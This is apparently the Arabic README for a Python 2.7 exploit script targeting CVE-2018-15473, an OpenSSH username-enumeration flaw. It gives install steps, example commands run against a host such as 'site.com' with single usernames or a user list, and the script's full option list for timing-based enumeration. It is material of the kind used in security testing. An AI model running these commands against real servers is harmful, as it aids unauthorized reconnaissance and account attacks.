
استغلال CVE-2018-15473
ستحتاج إلى Python 2.7 لاستخدام هذا الاستغلال. قم بتثبيت جميع الوحدات المذكورة أدناه في Python 2.7
مثل: python2 -m pip install numpy python2 -m pip install paramiko python2 -m pip install property
لاختبار اسم مستخدم واحد استخدم هذا الأمر: python ./sshuserenumeration.py -u
مثل: python ./sshuserenumeration.py -u root site.com
لاختبار عدة أسماء مستخدمين باستخدام ملف قائمة - استخدم هذا الأمر: python ./sshuserenumeration.py --userlist <name_list.txt>
مثل: python ./sshuserenumeration.py --userlist users.txt site.com
الاستخدام: sshuserenumeration.py [-h] [-u USER | -U USERLIST] [-e] [-s] [--bytes BYTES] [--samples SAMPLES] [--factor FACTOR] [--trials TRIALS] host
وسائط موضعية: host أعط عنوان خادم SSH مثل ip:port أو عبر ip فقط
وسائط اختيارية: -h, --help يعرض رسالة المساعدة هذه ويخرج -u USER, --user USER أعط اسم مستخدم واحد -U USERLIST, --userlist USERLIST أعط ملفًا يحتوي على قائمة مستخدمين -e, --enumerated أظهر المستخدمين الذين تم تعدادهم فقط -s, --silent مثل -e، ولكن ستُكتب أسماء المستخدمين فقط إلى stdout (لا رسالة ترحيب ولا أي شيء) --bytes BYTES أرسل عددًا معينًا من BYTES إلى خادم SSH ككلمة مرور --samples SAMPLES اجمع عددًا معينًا من SAMPLES لحساب خط أساس زمني لمصادقة المستخدمين غير الموجودين --factor FACTOR يُستخدم لحساب الحد الزمني الأعلى لتعداد المستخدمين --trials TRIALS حاول مصادقة المستخدم X لعدد TRIALS من المرات و قارن متوسط توقيتات المصادقة مع الحد الزمني